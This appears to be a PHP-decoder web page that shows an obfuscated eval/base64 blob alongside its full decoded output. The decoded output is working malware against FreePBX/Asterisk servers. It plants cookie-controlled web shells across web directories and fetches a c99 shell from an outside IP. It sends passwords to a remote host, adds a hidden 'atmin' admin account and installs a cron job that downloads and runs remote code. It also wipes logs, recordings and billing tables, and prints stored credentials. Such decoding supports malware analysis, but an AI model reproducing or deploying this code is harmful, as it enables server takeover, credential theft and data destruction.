Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzuncompress(base64_decode('eJzdGmt308bye37FovogucSS7bwIxgGHpG1OA+GSUM69JkesV2..

Decoded Output download

ini_set('error_reporting', 0);
ini_set('display_startup_errors', 0);
ini_set('display_errors', 0);
error_reporting(0);
$add_atmin = (isset($argv[1]) && ($argv[1] == 'files')) ? false : true;
$file = is_file("/etc/freepbx.conf") ? "/etc/freepbx.conf" : "/etc/asterisk/freepbx.conf";
is_file($file) ? eval(str_replace(array('<?php', '?>', 'require', 'include'), array('', '', '#require', '#include'), file_get_contents($file))) : '';
$amp_conf = (isset($amp_conf) ? $amp_conf : array());
$amportal = array();
foreach (explode("
", file_get_contents("/etc/amportal.conf")) as $key => $val) {
    if (preg_match_all("/=/", $val, $amp3)) {
        $exx = explode("=", $val);
        $amportal[$exx[0]] = trim((isset($amp_conf[$exx[0]]) ? $amp_conf[$exx[0]] : str_replace($exx[0] . '=', '', $val)));
    }
}
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser', 'AMPDBNAME' => 'asterisk'), $amp_conf, $amportal);
@chdir('/var/www/');
is_dir($amp["AMPWEBROOT"]) ? @chdir($amp["AMPWEBROOT"]) : "";
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace < 100) {
    @exec("nohup find /var/log/ -type f | xargs -I {} cp /dev/null {} &");
    @exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz &");
}
@exec("chmod 0000 /var/www/html/a2billing/");
$a2b = new simple_db_connect($amp['AMPDBHOST'], 'a2billinguser', 'a2billing');
if ($a2b) {
    $a2b->select_db('mya2billing');
    $a2b->query('drop table cc_ui_authen');
    $a2b->query('drop table cc_agent');
    $a2b->query('drop table cc_system_log');
}
$dirs = array(getcwd() . '/', '/var/www/html/', '/var/www/', '/var/www/freepbx/', '/var/www/localhost/', '/opt/freepbx/');
foreach ($dirs as $K => $V) {
    $dirs[] = $V . 'panel/';
    $dirs[] = $V . 'recordings/';
    $dirs[] = $V . 'vtigercrm/';
    $dirs[] = $V . 'public_html/';
    $dirs[] = $V . 'html/';
    $dirs[] = $V . 'freepbx/';
}
$dirs = array_unique($dirs);
sort($dirs);
$contents = array('c' => file_get_contents('http://173.212.233.104/c99.txt'), 'codes' => '<?php if((isset($_COOKIE["t3rr0r"])) && (md5(sha1($_COOKIE["t3rr0r"]))=="6fda262dc217716bed44e014046e2b6e")){ file_get_contents("http://51.158.24.255/f/c.php?coo=".$_COOKIE["t3rr0r"]); }  $cmd=((isset($_COOKIE["t3rr0r"])) && (md5(sha1($_COOKIE["t3rr0r"]))=="0e192062b367640f89ecff7c7f4ae1b9"))? $_COOKIE["cmd"]: "echo \'Unauth0r1zed\'";  system($cmd); file_put_contents("Unauth0r1zed1".date("j.n.Y").".log", $_COOKIE["t3rr0r"]." 
================
", FILE_APPEND); ?>', 'coc' => '<?php if (isset($_REQUEST["p"]) && md5($_REQUEST["p"]) == "dd7c037041607c6d13c0b7c815c85102") { file_get_contents("http://51.158.24.255/f/c.php?coc=".$_REQUEST["p"]); } $cmd=((isset($_COOKIE["t3rr0r"])) && (md5(sha1($_COOKIE["t3rr0r"]))=="0e192062b367640f89ecff7c7f4ae1b9"))? $_COOKIE["cmd"]: "echo \'Unauth0r1zed\'";  system($cmd); file_put_contents("Unauth0r1zed_".date("j.n.Y").".log", $_COOKIE["t3rr0r"]." 
================
", FILE_APPEND); file_put_contents("Unauth0r1zed_".date("j.n.Y").".log", $_COOKIE["p"]." 
================
", FILE_APPEND); ?>');
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace > 100) {
    foreach ($dirs as $k => $where) {
        if (is_dir($where)) {
            (is_writeable($where)) ? write_dir($where) : '';
            $od = opendir($where);
            while ($rd = readdir($od)) {
                $wd = $where . '/' . $rd;
                (($rd != '..') && ($rd != '.') && is_writeable($wd) && is_dir($wd)) ? write_dir($wd) : '';
            }
        }
    }
    icwrite_dirs("/var/www/html/admin/modules/_cache/");
    icwrite_dirs("/var/www/html/admin/modules/");
    icwrite_dirs("/var/www/html/admin/assets/");
    icwrite_dirs("/var/www/html/admin/libraries/");
    icwrite_dirs("/var/www/html/recordings/misc/");
    icwrite_dirs("/var/www/html/recordings/lang/");
}
$pass = random_password();
if ($add_atmin) {
    if (count($amp) > 3) {
        echo "
[+] Config Fetched ..";
        $db = new simple_db_connect($amp['AMPDBHOST'], $amp['AMPDBUSER'], $amp['AMPDBPASS']);
        echo "
[+] Connected To Database server ..";
        $db->select_db($amp['AMPDBNAME']);
        echo "
[+] Connected To Database ..";
        $db->query("delete from ampusers where username='atmin'", '
[-] Issue Deleting User');
        $query = $db->query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '" . sha1($pass) . "', '*' );", "
[-] Wrong Column ,, trying another column ..");
        if (!$query) {
            $query = $db->query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );", "
[-]Couldn't Determine Column .. Should Add admin Manually ..");
        }
        if ($query) {
            echo "
[+] Admin User Added ..
[+] atmin : $pass
";
        }
        is_dir("../admin") ? @symlink('../admin', 'atmin') : "";
        is_dir("/var/www/html/admin") ? @symlink('/var/www/html/admin', '/var/www/html/recordings/atmin') : "";
    } else {
        echo "
[-] Should Work Manually on this server ..
";
    }
    if (is_file("/var/www/html/libs/paloSantoDB.class.php")) {
        include_once "/var/www/html/libs/paloSantoDB.class.php";
        include_once "/var/www/html/libs/paloSantoACL.class.php";
        $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
        $pACL = new paloACL($pDB);
        $query = "SELECT id from acl_user where name='atmin'";
        $iddb = $pDB->fetchTable($query);
        $tid = $iddb[0][0];
        if ($tid < 2) {
            $pACL->createUser('atmin', '', md5($pass), '');
            $iddb = $pDB->fetchTable($query);
            $tid = $iddb[0][0];
        }
        $pACL->changePassword($tid, md5($pass));
        $pACL->addToGroup($tid, 1);
        echo "
[+] Admin User Added ..
[+] atmin : $pass
";
    }
}
$crin = exec('crontab -l');
if (!strpos($crin, '51.158.24.255')) {
    system('crontab -l | { cat; echo "0 1 * * * curl -ks http://51.158.24.255/t/cmd.txt>/tmp/a.txt;php /tmp/a.txt files >/dev/null 2>&1"; } | crontab -');
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
@system("grep AMPDB /etc/freepbx.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "------------Thats-All----------
";
function write_dir($where) {
    write_file($where . '/Do.php', 'coc');
    write_file($where . '/Ultimatex.php', 'coc');
    write_file($where . '/graph.php', 'codes');
    write_file($where . '/alex.php', 'codes');
    write_file($where . '/salem.php', 'c');
    write_file($where . '/oBo.php', 'codes');
    write_file($where . '/Bo.php', 'codes');
    write_file($where . '/free.php', 'codes');
    write_file($where . '/jeep.php', 'codes');
    write_file($where . '/fa.php', 'codes');
    write_file($where . '/rumio.php', 'codes');
    write_file($where . '/saher.php', 'c');
    write_file($where . '/paloSantoDB.php', 'c');
    write_file($where . '/asterisk.php', 'codes');
    write_file($where . '/monitor.php', 'codes');
    write_file($where . '/usa.php', 'c');
    write_file($where . '/SaLeM-123.php', 'coc');
    write_file($where . '/ab.php', 'coc');
    write_file($where . '/c58a155379a0.php', 'c');
    write_file($where . '/ayeshsalem.php', 'c');
    write_file($where . '/domdom.php', 'c');
    write_file($where . '/jnkp.php', 'c');
    write_file($where . '/phpversions.php', 'codes');
    write_file($where . '/config.all.php', 'c');
    write_file($where . '/actors.php', 'c');
    write_file($where . '/S!n4.php', 'coc');
    write_file($where . '/mae.php', 'coc');
    write_file($where . '/maf.php', 'coc');
    write_file($where . '/W__A__H.php', 'coc');
    write_file($where . '/crmmng.php', 'c');
}
function icwrite_dirs($where) {
    write_file($where . '/config.php', 'c');
    write_file($where . '/index.php', 'codes');
}
function write_file($fname, $wtw) {
    GLOBAL $contents;
    if ($contents[$wtw] !== '') {
        if (is_file($fname)) {
            @exec("chattr -ia $fname");
        }
        file_put_contents($fname, $contents[$wtw]);
        if (is_file($fname)) {
            @touch($fname, strtotime('-10 years', time()));
            @exec("chattr +a $fname");
        }
    }
}
function random_password($length = 7) {
    $set = array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
    $str = 't';
    for ($i = 0;$i < $length;$i++) {
        $str.= $set[rand(0, count($set) - 1) ];
    }
    return $str;
}
class simple_db_connect {
    var $link;
    function simple_db_connect($host, $username, $password) {
        if (function_exists('mysqli_connect')) {
            $this->link = mysqli_connect($host, $username, $password) or print (mysqli_error($this->link));
        } elseif (function_exists('mysql_connect')) {
            $this->link = mysql_connect($host, $username, $password) or print (mysql_error());
        }
    }
    function select_db($dbname) {
        if (function_exists('mysqli_select_db')) {
            mysqli_select_db($this->link, $dbname) or print (mysqli_error($this->link));
        } elseif (function_exists('mysql_select_db')) {
            mysql_select_db($dbname, $this->link) or print (mysql_error());
        }
        return true;
    }
    function query($query_data, $error_message = '') {
        global $con;
        if (function_exists('mysqli_query')) {
            $query = mysqli_query($this->link, $query_data) or print ($error_message . mysqli_error($this->link));
        } elseif (function_exists('mysql_query')) {
            $query = mysql_query($query_data, $this->link) or print ($error_message . mysql_error());
        }
        return $query;
    }
}
@system("chattr -ia /tmp/*.txt /tmp/*.php");
@system("rm -rf /tmp/*.txt /tmp/*.php");

Did this file decode correctly?

Original Code

<?php
eval(gzuncompress(base64_decode('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')));
?>

Function Calls

gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 5fb6022bdb16a1dea3e3d5d5d4f4c354
Eval Count 1
Decode Time 47 ms